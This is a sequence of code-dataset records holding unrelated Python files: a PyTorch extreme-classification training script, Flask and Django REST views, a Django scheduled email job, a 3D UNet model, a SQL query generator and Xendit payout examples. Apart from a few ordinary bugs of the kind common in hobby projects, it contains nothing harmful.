handle_microarchs(\"*:march_id\", march_ids, filtered_builds, settings, bch_rpc_off, env_vars, build_requires)\n\n # handle_microarchs(\"*:march_id\", march_ids, filtered_builds, settings, btc_rpc_off_full, env_vars, build_requires)\n # handle_microarchs(\"*:march_id\", march_ids, filtered_builds, settings, btc_rpc_on_full, env_vars, build_requires)\n # handle_microarchs(\"*:march_id\", march_ids, filtered_builds, settings, btc_rpc_on, env_vars, build_requires)\n # handle_microarchs(\"*:march_id\", march_ids, filtered_builds, settings, btc_rpc_off, env_vars, build_requires)\n\n # ci_currency = os.getenv('KTH_CI_CURRENCY', None)\n # if ci_currency is not None:\n # options[\"*:currency\"] = ci_currency\n\n # rpc_off = copy.deepcopy(options)\n # rpc_on = copy.deepcopy(options)\n # rpc_off[\"*:rpc\"] = \"False\"\n # rpc_on[\"*:rpc\"] = \"True\"\n\n # rpc_off_full = copy.deepcopy(rpc_off)\n # rpc_on_full = copy.deepcopy(rpc_on)\n # rpc_off_full[\"*:db\"] = \"full\"\n # rpc_on_full[\"*:db\"] = \"full\"\n \n # handle_microarchs(\"*:march_id\", march_ids, filtered_builds, settings, rpc_off_full, env_vars, build_requires)\n # handle_microarchs(\"*:march_id\", march_ids, filtered_builds, settings, rpc_on_full, env_vars, build_requires)\n # handle_microarchs(\"*:march_id\", march_ids, filtered_builds, settings, rpc_on, env_vars, build_requires)\n # handle_microarchs(\"*:march_id\", march_ids, filtered_builds, settings, rpc_off, env_vars, build_requires)\n\n\n builder.builds = filtered_builds\n builder.run()\n","sub_path":"build.py","file_name":"build.py","file_ext":"py","file_size_in_byte":3758,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"305940329","text":"import torch.nn as nn\nfrom torch.utils.data import BatchSampler, SequentialSampler, RandomSampler\nfrom utils import *\nimport time\nimport logging\nimport gzip\nimport os\nimport math\nfrom scipy.io.arff import loadarff\nfrom torchviz import make_dot\nimport 
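The builder above deep-copies the options dict before toggling one flag per variant so that variants never share state; the pattern in miniature:

import copy

base = {'*:currency': 'BCH'}
rpc_off = copy.deepcopy(base)
rpc_on = copy.deepcopy(base)
rpc_off['*:rpc'] = 'False'
rpc_on['*:rpc'] = 'True'
# base is untouched; each variant diverges independently.
assert '*:rpc' not in base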
numpy as np\nfrom torch import optim\nimport pandas as pd\nfrom sklearn.feature_extraction.text import CountVectorizer, TfidfVectorizer\nfrom torchsummary import summary\nfrom torch import nn\nimport torch\nfrom model.net import AttentionModel\nfrom losses import Loss\nimport sys\nimport matplotlib.pyplot as plt\nimport matplotlib as mpl\nmpl.use('Agg')\ntorch.manual_seed(1)\n\ntry:\n import cPickle as thepickle\nexcept ImportError:\n import _pickle as thepickle\n\ntorch.set_default_tensor_type(torch.FloatTensor)\n\n\nclass Solver():\n def __init__(self, model, loss, outdim_size, params, device=torch.device('cpu')):\n self.model = model\n self.model.to(device)\n self.epoch_num = params['epoch_num']\n self.batch_size = params['batch_size']\n self.loss = loss\n self.optimizer = torch.optim.Adam(\n model.parameters(), lr=params['learning_rate'], weight_decay=params['reg_par'])\n self.device = device\n\n self.reg_par = params['reg_par']\n self.outdim_size = outdim_size\n\n formatter = logging.Formatter(\n \"[ %(levelname)s : %(asctime)s ] - %(message)s\")\n logging.basicConfig(\n level=logging.DEBUG, format=\"[ %(levelname)s : %(asctime)s ] - %(message)s\")\n self.logger = logging.getLogger(\"Pytorch\")\n fh = logging.FileHandler(\"XML_rcv.log\")\n fh.setFormatter(formatter)\n self.logger.addHandler(fh)\n\n self.logger.info(self.model)\n self.logger.info(self.optimizer)\n self.start_epoch = 0\n\n def fit(self, X_train, Y_train,\n v_x=None, v_y=None,\n t_x=None, t_y=None,\n checkpoint='', load_model=False):\n \"\"\"\n x1, x2 are the vectors needs to be make correlated\n dim=[batch_size, feats]\n \"\"\"\n X_train = X_train\n Y_train = Y_train\n #tfidf = tfidf\n data_size = X_train.shape[0]\n print(X_train.shape, Y_train.shape)\n if v_x is not None and v_y is not None:\n best_val_loss = None\n v_x\n #v_tfidf\n v_y\n if t_x is not None and t_y is not None:\n t_x\n #t_tfidf\n t_y\n\n if(load_model):\n self.start_epoch, loss = self.load_model(checkpoint)\n\n train_losses = []\n while(self.start_epoch < self.epoch_num):\n epoch_start_time = time.time()\n self.model.train()\n batch_idxs = list(BatchSampler(RandomSampler(\n range(data_size)), batch_size=self.batch_size, drop_last=False))\n\n for batch_idx in batch_idxs:\n self.optimizer.zero_grad()\n X_train_b = X_train[batch_idx,:].toarray()\n Y_train_b = Y_train[batch_idx,:].toarray().astype('int')\n #print(X_train_b.shape, Y_train_b.shape)\n #print(X_train_b, Y_train_b)\n batch_X_train_b, tfidf_b, Y_train_b = prepare_tensors_from_data(X_train_b, Y_train_b)\n #print(batch_X_train_b.shape, tfidf_b.shape, Y_train_b.shape)\n batch_tfidf = tfidf_b.to(self.device)\n batch_X_train = batch_X_train_b.to(self.device)\n batch_Y_train = Y_train_b.to(self.device)\n x_hidden, y_hidden, y_predicted = self.model(\n batch_X_train, batch_tfidf, batch_Y_train)\n loss = self.loss(x_hidden, y_hidden,\n y_predicted, batch_Y_train)\n train_losses.append(loss.item())\n loss.backward()\n self.optimizer.step()\n #break\n train_loss = np.mean(train_losses)\n\n info_string = \"Epoch {:d}/{:d} - time: {:.2f} - training_loss: {:.4f}\"\n if v_x is not None and v_y is not None:\n with torch.no_grad():\n self.model.eval()\n val_loss = self.test(v_x, v_y)\n info_string += \" - val_loss: {:.4f}\".format(val_loss)\n if(best_val_loss is None):\n best_val_loss = val_loss\n elif val_loss < best_val_loss:\n self.logger.info(\n \"Epoch {:d}: val_loss improved from {:.4f} to {:.4f}, saving model to {}\".format(self.start_epoch + 1, best_val_loss, val_loss, checkpoint))\n best_val_loss = 
val_loss\n torch.save({\n 'epoch': self.start_epoch,\n 'model_state_dict': self.model.state_dict(),\n 'optimizer_state_dict': self.optimizer.state_dict(),\n 'loss': loss,\n }, checkpoint)\n else:\n self.logger.info(\"Epoch {:d}: val_loss did not improve from {:.4f}\".format(\n self.start_epoch + 1, best_val_loss))\n else:\n torch.save({\n 'epoch': self.start_epoch,\n 'model_state_dict': self.model.state_dict(),\n 'optimizer_state_dict': self.optimizer.state_dict(),\n 'loss': loss,\n }, checkpoint)\n epoch_time = time.time() - epoch_start_time\n self.logger.info(info_string.format(\n self.start_epoch + 1, self.epoch_num, epoch_time, train_loss))\n self.start_epoch += 1\n\n fig = plt.figure()\n ax = fig.add_subplot(111)\n ax.plot(np.array(train_losses), 'r')\n fig.savefig('loss.png')\n\n # fig = plt.figure()\n # plt.plot(np.array(train_losses), 'r')\n # plt.savefig('loss.png')\n # plt.close(fig)\n checkpoint_ = torch.load(checkpoint)['model_state_dict']\n self.model.load_state_dict(checkpoint_)\n if v_x is not None and v_y is not None:\n loss = self.test(v_x, v_y)\n self.logger.info(\"loss on validation data: {:.4f}\".format(loss))\n\n if t_x is not None and t_y is not None:\n loss = self.test(t_x, t_y)\n self.logger.info('loss on test data: {:.4f}'.format(loss))\n\n def test(self, x, y):\n # x = x\n # tfidf = tfidf\n # y = y\n with torch.no_grad():\n self.model.eval()\n data_size = x.shape[0]\n batch_idxs = list(BatchSampler(SequentialSampler(\n range(data_size)), batch_size=self.batch_size, drop_last=False))\n losses = []\n for batch_idx in batch_idxs:\n x_b, tfidf_b, y_b = prepare_tensors_from_data(x[batch_idx,:].toarray(), y[batch_idx,:].toarray().astype('int'))\n batch_x1 = x_b.to(self.device)\n batch_tfidf = tfidf_b.to(self.device)\n batch_y = y_b.to(self.device)\n x_hidden, y_hidden, y_predicted = self.model(\n batch_x1, batch_tfidf, batch_y)\n loss = self.loss(x_hidden, y_hidden,\n y_predicted, batch_y)\n losses.append(loss.item())\n #break\n return np.mean(losses)\n\n def load_model(self, path):\n print(\"=> loading checkpoint '{}'\".format(path))\n checkpoint_ = torch.load(path)\n self.model.load_state_dict(checkpoint_['model_state_dict'])\n self.optimizer.load_state_dict(checkpoint_['optimizer_state_dict'])\n start_epoch = int(checkpoint_['epoch'])+1\n loss = checkpoint_['loss']\n return start_epoch, loss\n\n def predict(self, X_test, Y_test):\n # tfidf = tfidf\n # bow = X_test\n with torch.no_grad():\n self.model.eval()\n data_size = X_test.shape[0]\n batch_idxs = list(BatchSampler(SequentialSampler(\n range(data_size)), batch_size=self.batch_size, drop_last=False))\n outputs1 = []\n correct_output = []\n for batch_idx in batch_idxs:\n bow_b, tfidf_b, Y_test_b = prepare_tensors_from_data(X_test[batch_idx,:].toarray(), Y_test[batch_idx,:].toarray().astype('int'))\n batch_x1 = bow_b.to(device)\n batch_tfidf = tfidf_b.to(device)\n o1 = self.model.predict(batch_x1, batch_tfidf)\n outputs1.append(o1)\n correct_output.append(Y_test_b)\n outputs = torch.cat(outputs1, dim=0)\n correct_output = torch.cat(correct_output, dim = 0)\n return outputs\n\n\ndef split_test_val(X, Y):\n indices = np.random.permutation(X.shape[0])\n val_size = int(0.2*X.shape[0])\n val_idx, test_idx = indices[:val_size], indices[val_size:]\n X_val = X[val_idx]\n #tfidf_val = tfidf[val_idx]\n Y_val = Y[val_idx]\n X_test = X[test_idx]\n #tfidf_test = tfidf[test_idx]\n Y_test = Y[test_idx]\n return X_val, Y_val, X_test, Y_test\n\nif __name__ == '__main__':\n\n # wget --no-check-certificate 
'https://docs.google.com/uc?export=download&id=0B3lPMIHmG6vGU0VTR1pCejFpWjg' -O Eurlex.zip\n # wget --no-check-certificate 'https://docs.google.com/uc?export=download&id=0B3lPMIHmG6vGdnEzRWZWQWJMRnc' -O RCV1-x.zip\n # wget --no-check-certificate 'https://docs.google.com/uc?export=download&id=0B3lPMIHmG6vGdG1jZ19VS2NWRVU' -O Delicious.zip\n\n ############\n # Parameters Section\n # mpl_logger = logging.getLogger(\"matplotlib\")\n # mpl_logger.setLevel(logging.INFO)\n device = torch.device('cuda' if torch.cuda.is_available() else 'cpu')\n print(\"device\", device)\n print(\"Using\", torch.cuda.device_count(), \"GPUs\")\n\n # the size of the new space learned by the model (number of the new features)\n\n ### For mediamill ##\n #input_size = 120\n #output_size = 101\n #embedding_size = 100\n #attention_layer_size = 50\n #encoder_layer_size = 120\n #hidden_layer_size = 80\n\n ### For Delicious ##\n #input_size = 500\n #output_size = 983\n #embedding_size = 100\n #attention_layer_size = 50\n #encoder_layer_size = 120\n #hidden_layer_size = 80\n\n ### For Eurlex ##\n # input_size = 5000\n # output_size = 3993\n # embedding_size = 100\n # attention_layer_size = 25\n # encoder_layer_size = 600\n # hidden_layer_size = 200\n\n ### For RCV ##\n input_size = 47236\n output_size = 2456\n embedding_size = 100\n attention_layer_size = 25\n encoder_layer_size = 600\n hidden_layer_size = 200\n\n # the parameters for training the network\n params = dict()\n params['learning_rate'] = 1e-3\n params['epoch_num'] = 100\n if(len(sys.argv) > 1):\n params['epoch_num'] = int(sys.argv[1])\n params['batch_size'] = 64\n params['reg_par'] = 1e-5\n\n # the regularization parameter of the network\n # seems necessary to avoid the gradient exploding especially when non-saturating activations are used\n r1 = 5e-7\n m = 0.6\n lamda = 100\n # specifies if all the singular values should get used to calculate the correlation or just the top outdim_size ones\n # if one option does not work for a network or dataset, try the other one\n use_all_singular_values = False\n\n # end of parameters section\n\n ########### Mediamill/Delicious ###########\n #X_train, Y_train, X_test, Y_test = load_small_data(\n # full_data_path=\"/home/praveen/Desktop/iiith-assignments/ExtremeClassification/Mediamill/Mediamill_data.txt\",\n # tr_path=\"/home/praveen/Desktop/iiith-assignments/ExtremeClassification/Mediamill/mediamill_trSplit.txt\",\n # tst_path=\"/home/praveen/Desktop/iiith-assignments/ExtremeClassification/Mediamill/mediamill_trSplit.txt\"\n # )\n #X_train, Y_train, X_test, Y_test = load_small_data(\n # full_data_path=\"/home/praveen.balireddy/XML/datasets/Delicious/Delicious_data.txt\",\n # tr_path=\"/home/praveen.balireddy/XML/datasets/Delicious/delicious_trSplit.txt\",\n # tst_path=\"/home/praveen.balireddy/XML/datasets/Delicious/delicious_tstSplit.txt\"\n # )\n ########### Eurlex-4k ###########\n # X_train, Y_train = load_data(\n # path=\"/home/praveen/Desktop/iiith-assignments/ExtremeClassification/Eurlex/eurlex_train.txt\", isTxt=True)\n # X_test, Y_test = load_data(\n # path=\"/home/praveen/Desktop/iiith-assignments/ExtremeClassification/Eurlex/eurlex_test.txt\", isTxt=True)\n # X_train, Y_train = load_data(\n # path=\"/home/praveen.balireddy/XML/datasets/RCV1-x/rcv1x_train.txt\", isTxt=True)\n # X_test, Y_test = load_data(\n # path = \"/home/praveen.balireddy/XML/datasets/RCV1-x/rcv1x_test.txt\", isTxt = True)\n\n ########### RCV ###########\n X_train, Y_train=load_rcv_data(\n 
path=\"/home/praveen.balireddy/XML/datasets/RCV1-x/rcv1x_train.txt\")\n X_test, Y_test=load_rcv_data(\n path=\"/home/praveen.balireddy/XML/datasets/RCV1-x/rcv1x_test.txt\")\n\n ### Common code from here #########\n #X_train, train_tfidf, Y_train = prepare_tensors_from_data(X_train, Y_train)\n #X_test, test_tfidf, Y_test = prepare_tensors_from_data(X_test, Y_test)\n X_val, Y_val, _, _ = split_test_val(\n X_test, Y_test)\n # Building, training, and producing the new features by DCCA\n model = AttentionModel(input_size=input_size, embedding_size=embedding_size,\n attention_layer_size=attention_layer_size, encoder_layer_size=encoder_layer_size,\n hidden_layer_size=hidden_layer_size, output_size=output_size).to(device)\n # print(sum(p.numel() for p in model.parameters() if p.requires_grad))\n loss_func = Loss(outdim_size=hidden_layer_size, use_all_singular_values=use_all_singular_values,\n device=device, r1=r1, m=m, lamda=lamda).loss\n solver = Solver(model=model, loss=loss_func,\n outdim_size=output_size, params=params, device=device)\n check_path = \"/home/praveen.balireddy/XML/checkpoints/checkpoint_rcv.model\"\n # check_path = \"./checkpoint.model\"\n solver.fit(X_train, Y_train, X_val, Y_val, checkpoint=check_path, load_model=False)\n y_pred, Y_test = solver.predict(X_test, Y_test)\n y_pred = to_numpy(y_pred)\n Y_test = to_numpy(Y_test)\n #print(y_pred)\n #print(Y_test)\n print(\"#########################\")\n print(\"P@1: \", p_k(y_pred, Y_test, 1))\n print(\"P@3: \", p_k(y_pred, Y_test, 3))\n print(\"P@5: \", p_k(y_pred, Y_test, 5))\n print(\"#########################\")\n print(\"n@1: \", n_k(y_pred, Y_test, 1))\n print(\"n@3: \", n_k(y_pred, Y_test, 3))\n print(\"n@5: \", n_k(y_pred, Y_test, 5))\n d = torch.load(check_path)\n solver.model.load_state_dict(d['model_state_dict'])\n solver.model.parameters()\n","sub_path":"main_rcv.py","file_name":"main_rcv.py","file_ext":"py","file_size_in_byte":14799,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"272787619","text":"# -*- coding: utf-8 -*-\n\"\"\"\nDefines views.\n\"\"\"\n# pylint: disable=unused-wildcard-import, wildcard-import\nimport calendar\nimport logging\nfrom flask import redirect, abort, render_template\nfrom jinja2 import TemplateNotFound\n\nfrom presence_analyzer.main import app\nfrom presence_analyzer import utils\n\nlog = logging.getLogger(__name__) # pylint: disable=invalid-name\n\n\n@app.route('/')\ndef mainpage():\n \"\"\"\n Redirects to front page.\n \"\"\"\n return redirect('/presence_weekday.html')\n\n\n@app.route('/api/v1/users', methods=['GET'])\n@utils.jsonify\ndef users_view():\n \"\"\"\n Users listing for dropdown.\n \"\"\"\n data = utils.get_xml_data()\n\n return [\n {'user_id': i, 'name': data[i]['name']}\n for i in data.keys()\n ]\n\n\n@app.route('/api/v1/mean_time_weekday/', methods=['GET'])\n@utils.jsonify\ndef mean_time_weekday_view(user_id):\n \"\"\"\n Returns mean presence time of given user grouped by weekday.\n \"\"\"\n data = utils.get_data()\n if user_id not in data:\n log.debug('User %s not found!', user_id)\n abort(404)\n\n weekdays = utils.group_by_weekday(data[user_id])\n result = [\n (calendar.day_abbr[weekday], utils.mean(intervals))\n for weekday, intervals in enumerate(weekdays)\n ]\n\n return result\n\n\n@app.route('/api/v1/presence_weekday/', methods=['GET'])\n@utils.jsonify\ndef presence_weekday_view(user_id):\n \"\"\"\n Returns total presence time of given user grouped by weekday.\n \"\"\"\n data = utils.get_data()\n if user_id not in 
data:\n log.debug('User %s not found!', user_id)\n abort(404)\n\n weekdays = utils.group_by_weekday(data[user_id])\n result = [\n (calendar.day_abbr[weekday], sum(intervals))\n for weekday, intervals in enumerate(weekdays)\n ]\n\n result.insert(0, ('Weekday', 'Presence (s)'))\n return result\n\n\n@app.route('/api/v1/presence_start_end/', methods=['GET'])\n@utils.jsonify\ndef presence_start_end(user_id):\n \"\"\"\n Return presence mean start and end times for given user grouped by weekday.\n \"\"\"\n data = utils.get_data()\n if user_id not in data:\n log.debug('User %s not found!', user_id)\n abort(404)\n\n weekdays = utils.mean_start_stop(data[user_id])\n result = [\n (calendar.day_abbr[weekday], day['Start'], day['End'])\n for weekday, day in enumerate(weekdays)\n ]\n return result\n\n\n@app.route('/', methods=['GET'])\ndef render_all(temp_name):\n \"\"\"\n Render templates.\n \"\"\"\n try:\n return render_template(temp_name, selected=temp_name)\n except TemplateNotFound:\n return render_template('notFound.html')\n\n\n@app.route('/api/v1/user_avatar/', methods=['GET'])\n@utils.jsonify\ndef user_avatar(user_id):\n \"\"\"\n Return path to users avatar.\n \"\"\"\n data = utils.get_xml_data()\n user_id = str(user_id)\n return data[user_id]['avatar']\n","sub_path":"src/presence_analyzer/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2928,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"464896960","text":"#!/usr/bin/python2.4\n#\n# Small script to show PostgreSQL and Pyscopg together\n#\nimport sys\nsys.path.append(\"..\")\nfrom common import randop\n\n\ndef create_sql_in_withindex():\n name = randop.create_random_string(6)\n sql = \"SELECT * from COMPANY where id IN (SELECT id FROM CORP where name = 'Paul')\"\n return sql\n\ndef create_sql_in_noindex():\n rowkey = randop.create_random_int(1, 10000)\n sql = \"SELECT * from COMPANY where age IN (SELECT age FROM CORP where id < %d )\"%rowkey\n return sql\n\ndef create_sql_in_noanyindex():\n name = randop.create_random_string(6)\n sql = \"SELECT * from COMPANY where age IN (SELECT age FROM CORP where name = 'Paul')\"\n return sql\n######################################\n# Test #\n######################################\nif __name__ == '__main__':\n a = create_sql_in_withindex()\n print (a)\n","sub_path":"old/old_test_modules/_old/sql/IN.py","file_name":"IN.py","file_ext":"py","file_size_in_byte":874,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"353183243","text":"import logging\n\nfrom django.conf import settings\n\nfrom apscheduler.schedulers.blocking import BlockingScheduler\nfrom apscheduler.triggers.cron import CronTrigger\nfrom django.core.management.base import BaseCommand\nfrom django_apscheduler.jobstores import DjangoJobStore\nfrom django_apscheduler.models import DjangoJobExecution\n\nfrom blogapp.models import *\nfrom django.core.mail import EmailMultiAlternatives\nfrom django.template.loader import render_to_string\n\n\nimport datetime\n\nlogger = logging.getLogger(__name__)\n\n\n# наша задача по выводу текста на экран\ndef my_job():\n # Your job processing logic here...\n print('hello from job')\n\n\ndef send_letters_to_subscribers():\n categories = Category.objects.all()\n emails = []\n\n for cat in categories:\n cat_subscribers = list(User.objects.filter(categories=cat))\n if cat_subscribers:\n for user in cat_subscribers:\n if user not in emails:\n\n date = datetime.date.today() - 
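The IN.py helpers above build SQL by string interpolation; with a DB-API driver such as psycopg2 (which the file header mentions), the value is better passed as a parameter so the driver handles quoting. A sketch; the cursor call is left commented since no connection is set up here:

rowkey = 42  # e.g. from randop.create_random_int(1, 10000)
sql = ('SELECT * FROM COMPANY '
       'WHERE age IN (SELECT age FROM CORP WHERE id < %s)')
params = (rowkey,)
# cur.execute(sql, params)  # psycopg2-style placeholder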
datetime.timedelta(days=7)\n posts = Post.objects.filter(created_time__gte=date)[:10]\n\n html_content = render_to_string(\n 'blogapp/weekly_mail.html',\n {\n 'posts': posts,\n 'user': user,\n }\n )\n\n msg = EmailMultiAlternatives(\n subject = 'Weekly mail to subscribers - Sasha blog',\n body = '',\n from_email='sendme.email@yandex.ru',\n to=[user.email, ]\n )\n\n msg.attach_alternative(html_content, 'text/html')\n msg.send()\n\n\n\n\n# function that deletes stale jobs\ndef delete_old_job_executions(max_age=604_800):\n \"\"\"This job deletes all apscheduler job executions older than `max_age` from the database.\"\"\"\n DjangoJobExecution.objects.delete_old_job_executions(max_age)\n\n\nclass Command(BaseCommand):\n help = \"Runs apscheduler.\"\n\n def handle(self, *args, **options):\n scheduler = BlockingScheduler(timezone=settings.TIME_ZONE)\n scheduler.add_jobstore(DjangoJobStore(), \"default\")\n\n # add the job to our scheduler\n scheduler.add_job(\n send_letters_to_subscribers,\n trigger=CronTrigger(\n day_of_week=\"mon\", hour=\"09\", minute=\"30\"\n ),\n # Works like an interval, but a cron trigger makes the schedule clearer to django\n id=\"send_letters_to_subscribers\", # unique id\n max_instances=1,\n replace_existing=True,\n )\n logger.info(\"Added job 'my_job'.\")\n\n scheduler.add_job(\n delete_old_job_executions,\n trigger=CronTrigger(\n day_of_week=\"mon\", hour=\"00\", minute=\"00\"\n ),\n # Every week, delete old jobs that either failed or no longer need to run.\n id=\"delete_old_job_executions\",\n max_instances=1,\n replace_existing=True,\n )\n logger.info(\n \"Added weekly job: 'delete_old_job_executions'.\"\n )\n\n try:\n logger.info(\"Starting scheduler...\")\n scheduler.start()\n except KeyboardInterrupt:\n logger.info(\"Stopping scheduler...\")\n scheduler.shutdown()\n logger.info(\"Scheduler shut down successfully!\")","sub_path":"djblog/blogapp/management/commands/runapscheduler.py","file_name":"runapscheduler.py","file_ext":"py","file_size_in_byte":3786,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"567820843","text":"import tensorflow as tf\n\nfrom tf_utils.blocks.cnn_block import CNN\n\n\nclass UNet(tf.keras.Model):\n def __init__(self, n_classes, n_layers, starting_filters, k_size, init, batch_norm, dropout, activation, conv_per_layer, max_pool,\n upsampling, kernel_regularizer, max_n_filters=512):\n super(UNet, self).__init__()\n\n self.n_layers = n_layers\n self.conv_per_layer = conv_per_layer\n self.max_pool = max_pool\n self.upsampling = upsampling\n\n if kernel_regularizer is not None:\n if kernel_regularizer[0] == \"L1\":\n kernel_regularizer = tf.keras.regularizers.L1(kernel_regularizer[1])\n elif kernel_regularizer[0] == \"L2\":\n kernel_regularizer = tf.keras.regularizers.L2(kernel_regularizer[1])\n else:\n raise NotImplementedError(kernel_regularizer)\n\n self.encoder = []\n for i in range(n_layers):\n # Set maximum number of filters\n n_filters = max_n_filters if starting_filters * (2 ** i) > max_n_filters else starting_filters * (2 ** i)\n\n # First layer does not have Batch Norm\n is_batch_norm = i != 0 and batch_norm\n\n if max_pool and i != 0:\n self.encoder.append(tf.keras.layers.MaxPool3D())\n\n # How many CNN layers at each stage\n for j in range(conv_per_layer):\n strides = 2 if j == 0 and i != 0 and max_pool is False else 1\n self.encoder.append(CNN(n_filters, k_size, strides=strides, kernel_initializer=init, 
batch_norm=is_batch_norm, dropout=False,\n activation=activation, kernel_regularizer=kernel_regularizer))\n\n self.decoder = []\n for i in range(n_layers - 2, -1, -1):\n n_filters = max_n_filters if starting_filters * (2 ** i) > max_n_filters else starting_filters * (2 ** i)\n\n if upsampling:\n self.decoder.append(tf.keras.layers.UpSampling3D())\n\n for j in range(conv_per_layer):\n strides = 2 if j == 0 and upsampling is False else 1\n self.decoder.append(\n CNN(n_filters, k_size, strides=strides, kernel_initializer=init, batch_norm=batch_norm, dropout=dropout, activation=activation,\n kernel_regularizer=kernel_regularizer, up=True))\n\n self.last_conv = CNN(n_classes, 3, kernel_initializer=init, batch_norm=None, dropout=0., activation=None)\n\n def call(self, x, training):\n\n skips = []\n for i in range(self.n_layers):\n\n if self.max_pool and i != 0:\n x = self.encoder[i * self.conv_per_layer + (i - 1)](x, training=training)\n\n for j in range(self.conv_per_layer):\n x = self.encoder[i * (self.conv_per_layer + int(self.max_pool)) + j](x, training=training)\n skips.append(x)\n\n skips = list(reversed(skips[:-1]))\n for i in range(len(range(self.n_layers - 2, -1, -1))):\n\n if self.upsampling:\n x = self.decoder[i * (self.conv_per_layer + int(self.upsampling))](x, training=training)\n x = tf.keras.layers.Concatenate()([x, skips[i]])\n\n for j in range(self.conv_per_layer):\n x = self.decoder[i * (self.conv_per_layer + int(self.upsampling)) + j + int(self.upsampling)](x, training=training)\n\n if j == 0 and self.upsampling is False:\n x = tf.keras.layers.Concatenate()([x, skips[i]])\n\n return self.last_conv(x)\n\n def summary(self, input_shape):\n \"\"\"\n :param input_shape: (32, 32, 1)\n \"\"\"\n x = tf.keras.Input(shape=input_shape)\n model = tf.keras.Model(inputs=[x], outputs=self.call(x, training=False))\n tf.keras.utils.plot_model(model, to_file='UNet.png', show_shapes=True, expand_nested=True)\n model.summary(line_length=200)\n\n\nif __name__ == \"__main__\":\n net = UNet(9, 5, 64, 3, \"he_normal\", False, 0., tf.keras.layers.LeakyReLU, 3, True)\n net.summary((176, 144, 128, 2))\n","sub_path":"francesco/src/model/unet.py","file_name":"unet.py","file_ext":"py","file_size_in_byte":4073,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"400673293","text":"# pylint: disable=no-member, no-self-use\nfrom rest_framework.views import APIView\nfrom rest_framework.response import Response\nfrom rest_framework import status\nfrom rest_framework.exceptions import NotFound\nfrom rest_framework.permissions import IsAuthenticated, IsAuthenticatedOrReadOnly\n\nfrom .models import Art\nfrom .serializers import PopulatedArtSerializer, ArtSerializer, UpdateArtSerializer\n\nclass ArtListView(APIView):\n\n permission_classes = (IsAuthenticatedOrReadOnly, )\n\n def get(self, _request):\n arts = Art.objects.all()\n serialized_arts = PopulatedArtSerializer(arts, many=True)\n return Response(serialized_arts.data, status=status.HTTP_200_OK)\n\n def post(self, request):\n request.data['owner'] = request.user.id\n new_art = ArtSerializer(data=request.data)\n if new_art.is_valid():\n new_art.save()\n return Response(new_art.data, status=status.HTTP_201_CREATED)\n return Response(new_art.errors, status=status.HTTP_422_UNPROCESSABLE_ENTITY)\n\nclass ArtDetailView(APIView):\n\n permission_classes = (IsAuthenticatedOrReadOnly, )\n\n def get_art(self, pk):\n try:\n return Art.objects.get(pk=pk)\n except Art.DoesNotExist:\n raise NotFound()\n\n def get(self, 
_request, pk):\n art = self.get_art(pk)\n serialized_art = PopulatedArtSerializer(art)\n return Response(serialized_art.data, status=status.HTTP_200_OK)\n\n def put(self, request, pk):\n art_to_update = self.get_art(pk=pk)\n updated_art = UpdateArtSerializer(art_to_update, data=request.data)\n if updated_art.is_valid():\n updated_art.save()\n return Response(updated_art.data, status=status.HTTP_202_ACCEPTED)\n return Response(updated_art.errors, status=status.HTTP_422_UNPROCESSABLE_ENTITY)\n\n def delete(self, _request, pk):\n art_to_delete = self.get_art(pk=pk)\n art_to_delete.delete()\n return Response(status=status.HTTP_204_NO_CONTENT)\n","sub_path":"art/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2012,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"33636496","text":"import time\r\n\r\nfrom print_running_function import print_running_function\r\n\r\n# Hackish method to import from another directory\r\n# Useful while xendit-python isn't released yet to the public\r\nimport importlib.machinery\r\n\r\nloader = importlib.machinery.SourceFileLoader(\"xendit\", \"../xendit/__init__.py\")\r\nxendit = loader.load_module(\"xendit\")\r\n\r\n\r\nclass CreatePayout:\r\n @staticmethod\r\n def run(xendit_instance, **kwargs):\r\n try:\r\n payout = xendit_instance.Payout.create(**kwargs)\r\n print(payout)\r\n except xendit.XenditError as e:\r\n print(\"Error status code:\", e.status_code)\r\n print(\"Error message:\", e)\r\n\r\n @staticmethod\r\n def example(xendit_instance):\r\n args = {\r\n \"external_id\": f\"payout-{int(time.time())}\",\r\n \"amount\": 50000,\r\n \"email\": \"test@email.co\",\r\n }\r\n print_running_function(\"xendit.Payout.create\", args)\r\n CreatePayout.run(xendit_instance, **args)\r\n\r\n\r\nclass GetPayout:\r\n @staticmethod\r\n def run(xendit_instance, **kwargs):\r\n try:\r\n payout = xendit_instance.Payout.get(**kwargs)\r\n print(payout)\r\n except xendit.XenditError as e:\r\n print(\"Error status code:\", e.status_code)\r\n print(\"Error message:\", e)\r\n\r\n @staticmethod\r\n def example(xendit_instance):\r\n id = input(\"Please input your id: \")\r\n args = {\r\n \"id\": id,\r\n }\r\n print_running_function(\"xendit.Payout.get\", args)\r\n GetPayout.run(xendit_instance, **args)\r\n\r\n\r\nclass VoidPayout:\r\n @staticmethod\r\n def run(xendit_instance, **kwargs):\r\n try:\r\n payout = xendit_instance.Payout.void(**kwargs)\r\n print(payout)\r\n except xendit.XenditError as e:\r\n print(\"Error status code:\", e.status_code)\r\n print(\"Error message:\", e)\r\n\r\n @staticmethod\r\n def example(xendit_instance):\r\n id = input(\"Please input your id: \")\r\n args = {\r\n \"id\": id,\r\n }\r\n print_running_function(\"xendit.Payout.void\", args)\r\n VoidPayout.run(xendit_instance, **args)\r\n\r\n\r\ndef ask_payout_input():\r\n print(\"Input the action that you want to use\")\r\n print(\"0. Exit\")\r\n print(\"1. Create Payout\")\r\n print(\"2. Get Payout\")\r\n print(\"3. Void a Payout\")\r\n try:\r\n return int(input())\r\n except ValueError:\r\n print(\"Invalid input. 
